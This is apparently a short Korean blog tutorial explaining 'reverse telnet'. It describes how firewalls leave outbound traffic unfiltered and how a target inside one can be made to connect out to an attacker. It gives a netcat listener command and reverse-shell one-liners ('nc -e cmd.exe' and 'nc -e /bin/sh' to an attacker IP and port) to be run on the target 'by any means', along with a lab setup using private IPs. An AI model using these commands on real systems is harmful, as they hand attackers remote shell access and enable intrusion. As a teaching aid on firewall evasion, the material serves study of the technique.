[ATTACK] 리버스 텔넷(Reverse Telnet)

텔넷(TELNET)은 인터넷이나 로컬 영역 네트워크 연결에 쓰이는 네트워크 프로토콜로 일반적으로 23번 포트를 이용하여 원격접속 하는데 사용된다.

 

그렇다면 리버스 텔넷이란 무엇일까?

우리는 방화벽이 있는 환경에서 생활한다. 이 방화벽은 인바운드정책 (Inbound- 방화벽으로 들어올 수 있는 대상 제한)과 아웃바운드정책 (Outbound - 방화벽에서 나갈 수 있는 대상 제한)이 나누어져 있다.

인바운드는 웹에서 사용하는 80번 포트 외에 필요한 포트를 대부분 막아두는 것에 비해 아웃바운드는 별다른 필터링을 수행하는 않는 경우가 많은데 이런 상황에서 유용하게 사용하는 것이 리버스 텔넷이다.

방화벽 내에 존재하는 대상자에서 방화벽 외부의 공격자 컴퓨터로 텔넷을 이용하여 접속하는 기술로 일반적인 텔넷이 본인의 컴퓨터가 클라이언트가 되고 접속하고자 하는 대상의 컴퓨터가 서버가 되지만 이 경우에는 반대로 되기 때문에 리버스 텔넷이라고 한다.

 

그럼 리버스 텔넷은 어떻게 할 수 있을까?

 

nc(netcat)

바로 NC(netcat)을 이용하여 할 수 있는데
공격자의 PC에서 nc -l -p [PORT번호]를 통하여 리버스 텔넷에 이용할 포트를 열어둔다.
(nc가 설치되어 있는 경로에서 진행)

공격자의 IP address

공격자의 PC에서는 포트를 연다.

 

 

공격 대상자의 PC에서 명령어 실행

공격 대상자의 pc에서
윈도우 : nc -e cmd.exe [공격자 IP] [PORT번호]
리눅스 : nc -e /bin/sh [공격자 IP] [PORT번호] 
를 어떤 방법이든 이용하여 실행하게 된다면 원격 접속된다.

 

 

공격자의 PC에 대상자의 PC가 연결되며 IP를 확인하면 대상자의 PC가 나오는 것을 알 수 있다.

ipconfig 등을 이용하여 확인해보면 공격자의 IP(본인 IP)가 아닌 공격 대상자IP(상대방 IP)가 나오는 것을 확인할 수 있다.

 

실습 환경

공격자 PC IP - 192.168.5.10 windows10
공격 대상자 PC IP - 192.168.254.241 windows2003 (가상환경)